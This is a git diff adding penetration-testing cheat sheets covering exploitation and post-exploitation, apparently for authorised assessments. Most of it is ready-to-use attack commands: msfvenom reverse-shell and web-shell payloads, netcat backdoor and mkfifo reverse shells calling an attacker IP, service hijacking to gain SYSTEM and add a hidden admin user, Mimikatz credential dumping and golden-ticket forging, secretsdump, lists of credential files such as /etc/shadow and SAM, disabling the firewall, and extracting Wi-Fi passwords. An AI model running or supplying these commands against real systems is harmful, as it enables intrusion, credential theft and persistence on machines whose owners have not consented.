diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Msfvenom.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Msfvenom.md
new file mode 100644
index 0000000..f758318
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Msfvenom.md	
@@ -0,0 +1,86 @@
+## Creating a payload
+
+- msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport]
+
+To view list of payloads: msfvenom -l payloads
+To view the payload options: msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options
+
+## Creating a payload with encoding
+
+- msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] <var=value> > outputfile
+
+## Creating a payload using a template
+
+- msfvenom -p [payload] <var=value> -x [template] -f [formattype] > outputfile
+
+## Listening for MSfvenom Payloads:
+
+```
+msf5>use exploit/multi/handler  
+msf5>set payload windows/meterpreter/reverse_tcp  
+msf5>set lhost <IP>  
+msf5>set lport <PORT>  
+msf5> set ExitOnSession false  
+msf5>exploit -j  
+```
+
+## Windows Payloads
+
+- msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe	
+- msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe	
+- msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe	
+- msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe	
+- msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
+
+## Linux Payloads
+
+- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf	
+- msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf	
+- msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf	
+- msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
+
+Add a user in windows with msfvenom: 
+
+- msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe
+
+## Web Payloads
+
+PHP
+
+- msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
+cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
+
+ASP
+
+- msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
+
+JSP
+
+- msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
+
+WAR
+
+- msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
+
+## Scripting Payloads
+
+Python
+
+- msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
+
+Bash
+
+- msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
+
+Perl
+
+- msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
+
+
+Creating an Msfvenom Payload with an encoder while removing bad charecters:
+
+- msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x0A\x0D"
+
+## Resources:
+
+- https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Netcat Tips.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Netcat Tips.md
new file mode 100644
index 0000000..93a442b
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Netcat Tips.md	
@@ -0,0 +1,28 @@
+## Fundamentals:
+
+Connect to a netcat client:
+- rlwrap nc [IP Address] [port]
+
+Connect to a netcat Listener:
+
+- rlwrap nc -lvp [Localport]
+
+More info on rlwrap: https://linux.die.net/man/1/rlwrap
+
+## Backdoor Shells: 
+
+Linux: 
+
+- rlwrap nc [Your IP Address] -e /bin/sh 
+- rlwrap nc [Your IP Address] -e /bin/bash
+- rlwrap nc [Your IP Address] -e /bin/zsh
+- rlwrap nc [Your IP Address] -e /bin/ash
+
+
+Windows: 
+
+- rlwrap nc -lv [localport] -e cmd.exe
+
+Linux netcat reverse shell: 
+
+- rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.21.0.0 1234 >/tmp/f
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Searchsploit.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Searchsploit.md
new file mode 100644
index 0000000..7dd2010
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Searchsploit.md	
@@ -0,0 +1,39 @@
+## Installing searchsploit (Already in Kali)
+
+- apt update && apt install exploitdb
+
+## Install binsploits
+Note: bin-sploits contains a set of compiled binaries that are tied to exploits in the exploitdb database. Installing this package will take some time depending on your network connection. 
+
+- apt update && apt install exploitdb-bin-sploits
+
+## updating searchsploit
+
+- searchsploit -u
+
+## Basic Searching: 
+
+- searchsploit <program> <Operating System> <programming language> <version #> etc
+- searchsploit -t php windows
+
+## Exclude unwanted results
+- searchsploit linux kernel 5.2 --exclude="Poc"
+
+## View exploits from Searchsploit
+- searchsploit 9542 --examine
+- searchsploit -x window/remote/42031.py
+
+
+## Copy exploit to current working directory
+- searchsploit -m <Exploit Title> <Path>
+
+## Access Exploits from Exploit-DB website: 
+- searchsploit vsftpd 2.3.4 -w
+
+## Run an nmap scan result through searchsploit: 
+1. Nmap -Pn 172.21.0.0 -oX results.xml
+2. searchsploit -x --nmap results.xml
+
+Referneces: 
+
+- https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Transferring Files.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Transferring Files.md
new file mode 100644
index 0000000..2993d3f
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Transferring Files.md	
@@ -0,0 +1,55 @@
+# Services to Host Files on your System: 
+
+General Options: 
+
+FTP:
+
+Install pyftpdlib
+- pip3 install pyftpdlib
+
+Pure-ftpd
+- sudo apt install pure-ftpd
+- service pure-ftpd start
+
+Run (-w flag allows anonymous write access)
+- Python3 -m pyftpdlib -p 21 -w
+
+Web: 
+
+- Python3 -m http.server 443
+- service apache2 start
+
+Powershell: 
+
+Raw (Will get flagged by AV/AMSI): 
+
+- powershell -c (New-Object Net.WebClient).DownloadFile('http://172.21.0.0:port/file', 'output-file'
+- powershell -c Invoke-WebRequest -Uri "http://172.21.0.0" -OutFile "C:\path\file"
+
+
+Use Powercat: 
+
+Send File:
+    powercat -c 10.1.1.1 -p 443 -i C:\inputfile
+Recieve File:
+    powercat -l -p 8000 -of C:\inputfile
+
+Linux: 
+
+scp: 
+
+- scp [OPTION] [user@]SRC_HOST:]file1 [user@]DEST_HOST:]file2
+
+scp through ssh: 
+
+- scp -P 2322 passwords.txt remote_username@172.21.0.2:/remote/directory
+
+scp remote file to local system: 
+
+- scp remote_username@172.21.0.2:/remote/file.txt /local/directory
+
+
+# Services to allow you to upload files to your system from the target: 
+
+- SimpleHTTPServer Upload: https://gist.github.com/touilleMan/eb02ea40b93e52604938
+    
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Villian Cheatsheet.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Villian Cheatsheet.md
new file mode 100644
index 0000000..a8c24c6
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Villian Cheatsheet.md	
@@ -0,0 +1,23 @@
+# Installation:
+sudo apt update&&sudo apt install gnome-terminal
+git clone https://github.com/t3l3machus/Villain
+cd ./Villain
+pip3 install -r requirements.txt
+
+# Generating Payloads
+
+## Main Logic: 
+
+```
+generate payload=<OS_TYPE/HANDLER/PAYLOAD_TEMPLATE> lhost=<IP or INTERFACE> [ obfuscate encode ]
+```
+
+- 
+
+## Session Defender
+Villain has a function that inspects user issued shell commands for input that may cause a backdoor shell session to hang (e.g., unclosed single/double quotes or backticks, commands that may start a new interactive session within the current shell and more). Use the `cmdinspector` command to turn that feature on/off.  
+
+Usage: 
+```
+cmdinspector <ON/OFF>
+```
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/6. Exploitation Targets_/Target _1.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/6. Exploitation Targets_/Target _1.md
new file mode 100644
index 0000000..2ab5ecc
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/6. Exploitation Targets_/Target _1.md	
@@ -0,0 +1 @@
+# This is a placeholder to contain all notes regarding the exploitation phase for each target you assess.
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/BloodHound.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/BloodHound.md
new file mode 100644
index 0000000..a3257bc
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/BloodHound.md	
@@ -0,0 +1,63 @@
+# BloodHound
+
+###Source: 
+
+- https://github.com/BloodHoundAD/BloodHound
+
+## In Kali: 
+```
+$ sudo apt install bloodhound
+$ bloodhound 
+```
+## Installing:
+```
+$ cd /opt
+$ sudo git clone https://github.com/BloodHoundAD/BloodHound.git
+$ sudo wget https://github.com/BloodHoundAD/BloodHound/releases/download/3.0.3/BloodHound-linux-x64.zip
+```
+
+Neo4j has to be running for Bloodhound web app to work:
+```
+$ sudo neo4j console
+```
+Set the password if you haven't already. 
+
+Start bloodhound:
+```
+$ sudo ./Bloodhound --no-sandbox
+```
+
+## Pre-Compiled Binaries
+
+- https://github.com/BloodHoundAD/BloodHound/releases
+
+## SharpHound: 
+
+- https://github.com/BloodHoundAD/SharpHound3
+
+Execute on target:
+```
+C:\> .\SharpHound.exe -c all
+```
+or in Powershell with .ps1 version
+
+```
+C:\> import-module .\sharphound.ps1
+C:\> invoke-bloodHound -CollectionMethod all -domain <target-domain> -LDAPUser <username> -LDAPPass <password>
+```
+Note: `-domain`, `-LDAPUser`, and `-LDAPPass` are optional and bloodhound will run with only the `-CollectionMethod` flag. 
+
+Other useful sharphound flags:
+- `--encryptzip`: allows you to encrypt the file using a random password 
+- `--zipfilename`: allows you to name the outputted filename so that "bloodhound" isn't in the name in case AV catches it.
+
+If you want to run SharpHound from a PC that is not joined to the target domain, open a command prompt and run:
+```
+C:\> runas /netonly /user:DOMAIN\USER powershell.exe
+```
+Then run the PS commands listed above as the domain user in the PowerShell context.
+
+### Bloodhound for python 
+Note: Only compatiable with BloodHound 3.0 or newer
+
+https://github.com/fox-it/BloodHound.py
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Editable Services/General Notes.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Editable Services/General Notes.md
new file mode 100644
index 0000000..091ca71
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Editable Services/General Notes.md	
@@ -0,0 +1,27 @@
+# Editable Service
+
+If you find a service that is editable (WinPEAS can help here to find such services) you can edit the binpath to point to nc.exe to get a reverse shell. 
+
+Steps also described here: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#example-with-windows-10---cve-2019-1322-usosvc
+
+Note: in both my experiences using this, this does get shell, but it closes in a few seconds.
+
+  1. Upload `nc.exe` to a writable directory.
+  2. `sc config usosvc binpath= "C:\Inetpub\wwwroot\nc.exe -nv <kali_IP> 9988 -e C:\Windows\System32\cmd.exe"`
+  3. `sc config usosvc  obj= ".\LocalSystem" password= ""`
+     - I didn't need this second time using it
+  5. `sc config usosvc start= "demand"`
+  6. `nc -lvp 9988` (setup listener on kali)
+  7. `net start usosvc`
+  8. R00T!
+	
+Since shell closes soon, add new admin user:
+1. `net user hacker h@ck3r%93 /add`
+2. `net localgroup administrators hacker /add`
+
+Now RDP/ssh with new creds (if services are available, or you can open them yourself):
+1. `rdesktop <target>`
+2. R00T!
+
+The shell closes due to a Windows timeout variable in the registry that defines how long to wait for a service to response. If you're in a position to edit that (i.e. ssh/rdp not enabled) this would stabilize the shell.
+If you don’t want to edit the registry, since you're admin for a bit with this shell, you could try enabling RDP or SSH.
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Files on the System/General Notes Linux.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Files on the System/General Notes Linux.md
new file mode 100644
index 0000000..7bd19b0
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Files on the System/General Notes Linux.md	
@@ -0,0 +1,78 @@
+## Finding Sensitive files on Linux: 
+
+```
+locate password | more           
+/boot/grub/i386-pc/password.mod
+/etc/pam.d/common-password
+/etc/pam.d/gdm-password
+/etc/pam.d/gdm-password.original
+/lib/live/config/0031-root-password
+```
+- cat /etc/profile
+- cat /etc/passwd
+- cat /etc/group
+- cat /etc/shadow
+- cat /etc/gshadow
+- cat /var/apache2/config.inc
+- cat /var/lib/mysql/mysql/user.MYD
+- cat /root/anaconda-ks.cfg
+- cat ~/.bash_history
+- cat ~/.bash_profile
+- cat ~/.bash_login
+- cat ~/.nano_history
+- cat ~/.atftp_history
+- cat ~/.mysql_history
+- cat ~/.php_history
+- ls -alh /var/mail/
+
+Sensitive Files for SSH:
+
+- find / -name authorized_keys 2> /dev/null
+- find / -name id_rsa 2> /dev/null
+
+
+
+Log Files that could help:
+
+```
+cat /etc/httpd/logs/access_log
+cat /etc/httpd/logs/access.log
+cat /etc/httpd/logs/error_log
+cat /etc/httpd/logs/error.log
+cat /var/log/apache2/access_log
+cat /var/log/apache2/access.log
+cat /var/log/apache2/error_log
+cat /var/log/apache2/error.log
+cat /var/log/apache/access_log
+cat /var/log/apache/access.log
+cat /var/log/auth.log
+cat /var/log/chttp.log
+cat /var/log/cups/error_log
+cat /var/log/dpkg.log
+cat /var/log/faillog
+cat /var/log/httpd/access_log
+cat /var/log/httpd/access.log
+cat /var/log/httpd/error_log
+cat /var/log/httpd/error.log
+cat /var/log/lastlog
+cat /var/log/lighttpd/access.log
+cat /var/log/lighttpd/error.log
+cat /var/log/lighttpd/lighttpd.access.log
+cat /var/log/lighttpd/lighttpd.error.log
+cat /var/log/messages
+cat /var/log/secure
+cat /var/log/syslog
+cat /var/log/wtmp
+cat /var/log/xferlog
+cat /var/log/yum.log
+cat /var/run/utmp
+cat /var/webmin/miniserv.log
+cat /var/www/logs/access_log
+cat /var/www/logs/access.log
+ls -alh /var/lib/dhcp3/
+ls -alh /var/log/postgresql/
+ls -alh /var/log/proftpd/
+ls -alh /var/log/samba/
+
+Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
+```
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Files on the System/General Notes Windows.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Files on the System/General Notes Windows.md
new file mode 100644
index 0000000..743737e
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Files on the System/General Notes Windows.md	
@@ -0,0 +1,59 @@
+# Sensitive Files to look for: 
+
+## Windows: 
+
+```
+%windir%\repair\sam
+%windir%\System32\config\RegBack\SAM
+%windir%\repair\system
+%windir%\repair\software
+%windir%\repair\security
+%windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
+%windir%\iis6.log (5,6 or 7)
+%windir%\system32\logfiles\httperr\httperr1.log
+C:\sysprep.inf
+C:\sysprep\sysprep.inf
+C:\sysprep\sysprep.xml
+%windir%\Panther\Unattended.xml
+C:\inetpub\wwwroot\Web.config
+%windir%\system32\config\AppEvent.Evt (Application log)
+%windir%\system32\config\SecEvent.Evt (Security log)
+%windir%\system32\config\default.sav
+%windir%\system32\config\security.sav
+%windir%\system32\config\software.sav
+%windir%\system32\config\system.sav
+%windir%\system32\inetsrv\config\applicationHost.config
+%windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
+%windir%\System32\drivers\etc\hosts (dns entries)
+%windir%\System32\drivers\etc\networks (network settings)
+%windir%\system32\config\SAM (only really useful if you have access to the files while the machine is off)
+%windir%\unattend.xml
+%windir%\Windows\Panther\Unattend.xml
+%windir%\Windows\Panther\Unattend\Unattend.xml
+%windir%\Windows\system32\sysprep.inf
+%windir%\Windows\system32\sysprep\sysprep.xml
+C:\ProgramData\Configs\*
+C:\Program Files\Windows PowerShell\*
+dir c:*vnc.ini /s /b
+dir c:*ultravnc.ini /s /b
+```
+
+## Search for contents contained in a file:
+
+```
+cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
+findstr /si password *.xml *.ini *.txt *.config
+findstr /spin "password" *.*
+```
+
+## Search for a file with a certain filename:
+
+```
+dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
+where /R C:\ user.txt
+where /R C:\ *.ini
+```
+
+
+
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/General Notes.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/General Notes.md
new file mode 100644
index 0000000..a980c6c
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/General Notes.md	
@@ -0,0 +1,47 @@
+## Spawn a tty: 
+
+1. rlwrap nc localhost 80
+
+2. rlwrap -r -f . nc <IP ADDRESS> <PORT>
+
+- socat file:`tty`,raw,echo=0 tcp-listen:12345
+- /bin/sh -i
+- /bin/bash -i
+- python -c 'import pty; pty.spawn("/bin/sh")'
+- perl -e 'exec "/bin/sh";'
+- perl: exec "/bin/sh";
+- ruby: exec "/bin/sh"
+- lua: os.execute('/bin/sh')
+
+## Priviledge Escalation Scripts:
+
+Windows:
+- Windows Exploit Suggester (Next-Generation): https://github.com/bitsadmin/wesng
+- Sherlock: https://github.com/rasta-mouse/Sherlock
+- Powersploit: https://github.com/PowerShellMafia/PowerSploit
+- WinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
+- PrivescCheck: https://github.com/itm4n/PrivescCheck 
+
+Linux:
+- Linux Exploit Suggester 2: https://github.com/jondonas/linux-exploit-suggester-2
+- LinEnum: https://github.com/rebootuser/LinEnum
+- UnixPriv Checker: https://github.com/pentestmonkey/unix-privesc-check
+- LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
+
+## Other Resources: 
+
+PowerSharpPack:
+- https://github.com/S3cur3Th1sSh1t/PowerSharpPack 
+
+Windows: 
+- LOLBAS: https://lolbas-project.github.io/#
+- Windows Privilege Escalation Fundmentals: https://www.fuzzysecurity.com/tutorials/16.html
+- Hacktricks: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
+- SharpSuite: https://github.com/FuzzySecurity/Sharp-Suite
+- Watson: https://github.com/rasta-mouse/Watson
+- WinPwn: https://github.com/S3cur3Th1sSh1t/WinPwn
+
+Linux: 
+- GTFOBins: https://gtfobins.github.io/
+- g0tmi1k Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
+- Hacktricks: https://book.hacktricks.xyz/linux-hardening/privilege-escalation
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Installed Applications/General Notes Linux.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Installed Applications/General Notes Linux.md
new file mode 100644
index 0000000..568f33e
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Installed Applications/General Notes Linux.md	
@@ -0,0 +1,40 @@
+## Debian:
+
+- ls -alh /usr/bin/
+- ls -alh /sbin/
+- dpkg -l
+- ls -alh /var/cache/apt/archivesO
+- ls /usr/share/applications | awk -F '.desktop' ' { print $1}' -
+
+## RedHat:
+
+- rpm -qa
+- ls -alh /var/cache/yum/
+
+
+## BSD:
+
+- pkg_info
+
+## Gentoo:
+
+- equery list 
+- eix -I
+
+## Arch Linux:
+
+- pacman -Q
+
+
+## Bash Script:
+
+```
+#!/bin/bash
+IFS=: read -ra dirs_in_path <<< "$PATH"
+
+for dir in "${dirs_in_path[@]}"; do
+    for file in "$dir"/*; do
+        [[ -x $file && -f $file ]] && printf '%s\n' "${file##*/}"
+    done
+done
+```
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Installed Applications/General Notes Windows.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Installed Applications/General Notes Windows.md
new file mode 100644
index 0000000..b432383
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Installed Applications/General Notes Windows.md	
@@ -0,0 +1,40 @@
+# PowerShell
+
+```
+Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table –AutoSize
+```
+
+## Obtaining a list of programs from a remote system:
+
+- ```Invoke-command -computer remote_pc_name {Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize }```
+
+## Here is a script that will pull a list of software that is installed on the users system:
+
+```
+$listsoftware= Get-ChildItem HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall
+
+$names = $listsoftware |foreach-object {Get-ItemProperty $_.PsPath}
+
+foreach ($name in $names)
+{
+    Write-Host $name.Displayname
+}
+```
+
+## WMI:
+
+- ```Get-WmiObject -Class Win32_Product | Select-Object -Property Name > C:\InstalledSoftwareList.txt ```
+
+## Reviewing Installed Windows Features
+
+- ```Get-WindowsFeature | Where-Object {$_.InstallState -eq 'Installed'}```
+
+# Wmic 
+
+## Note: Microsoft has planned to deprecrate this program in new versions of Windows. The commands used can be slow to run but it will return the results it needed:
+
+- wmic /output:C:\InstalledSoftwareList.txt product get name,version
+
+## Saving it to a text file:
+
+- wmic product get name,version /format:csv > C:\InstalledSoftware.csv
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Kerberos Ticket Creation.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Kerberos Ticket Creation.md
new file mode 100644
index 0000000..cc20009
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Kerberos Ticket Creation.md	
@@ -0,0 +1,11 @@
+# Generate Silver Tickets with Impacket:
+- python3 ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>
+- python3 ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>
+
+# Generate Golden Tickets:
+- python3 ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
+- python3 ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
+
+# Credential Access with Secretsdump
+
+- impacket-secretsdump username@target-ip -dc-ip target-ip
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Mimikatz.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Mimikatz.md
new file mode 100644
index 0000000..c7cb78f
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Mimikatz.md	
@@ -0,0 +1,50 @@
+# Mimikatz
+
+Post exploitation commands must be executed from SYSTEM level privileges.
+- mimikatz # privilege::debug
+- mimikatz # token::whoami
+- mimikatz # token::elevate
+- mimikatz # lsadump::sam
+- mimikatz # sekurlsa::logonpasswords
+
+## Pass The Hash
+
+- mimikatz # sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash
+
+## Inject generated TGS key
+
+- mimikatz # kerberos::ptt <ticket_kirbi_file>
+
+## Generating a silver ticket 
+
+AES 256 Key:
+
+- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
+
+AES 128 Key:
+
+- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
+
+NTLM:
+
+- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
+
+
+## Generating a Golden Ticket
+
+AES 256 Key:
+
+- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>
+
+AES 128 Key: 
+
+- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>
+
+NTLM:
+
+- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>
+
+
+
+
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Network/General Notes Linux.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Network/General Notes Linux.md
new file mode 100644
index 0000000..ee984e2
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Network/General Notes Linux.md	
@@ -0,0 +1,38 @@
+## What does the targets network look like:
+
+- /sbin/ifconfig -a
+- /sbin/ip addr
+- cat /etc/network/interfaces
+- cat /etc/sysconfig/network
+- ip addr show
+
+## Network configuration Settings: 
+
+- cat /etc/resolv.conf
+- cat /etc/sysconfig/network
+- cat /etc/networks
+- iptables -L
+- hostname
+- dnsdomainname
+
+## List all current connections
+
+- lsof -i
+- lsof -i :80
+- grep 80 /etc/services
+- netstat -antup
+- netstat -antpx
+- netstat -tulpn
+- chkconfig --list
+- chkconfig --list | grep 3:on
+
+## Check the routes: 
+
+- arp -e
+- route
+- route -n 
+- /sbin/route -nee
+- ip route list
+
+References: 
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Network/General Notes Windows.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Network/General Notes Windows.md
new file mode 100644
index 0000000..d19d114
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Network/General Notes Windows.md	
@@ -0,0 +1,51 @@
+## List all network interfaces, IP, and DNS.
+
+- ipconfig /all
+- Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
+- Get-DnsClientServerAddress -AddressFamily IPv4 | ft
+
+
+## List all current connections
+
+netstat -nao
+
+## List firewall state and current configuration
+
+- netsh advfirewall firewall dump
+- netsh firewall show state
+- netsh firewall show config
+
+# List firewall's blocked ports
+
+- $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports
+
+# Disable firewall
+
+- netsh firewall set opmode disable (Older Versions of Windows)
+- netsh advfirewall set allprofiles state off
+
+## List current routing table
+
+- route print
+- Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
+
+## List the ARP table
+
+- arp -A
+- Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
+
+## List all network shares
+
+- net share
+
+## Wifi Passwords: 
+
+Finding the SSID:
+- netsh wland show profile
+
+Obtaining the cleartext password: 
+```
+netsh wlan show profile <SSID> key=clear- cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
+
+(netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)}  | Select-String 'Key Content\W+\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }}
+```
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Rubeus.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Rubeus.md
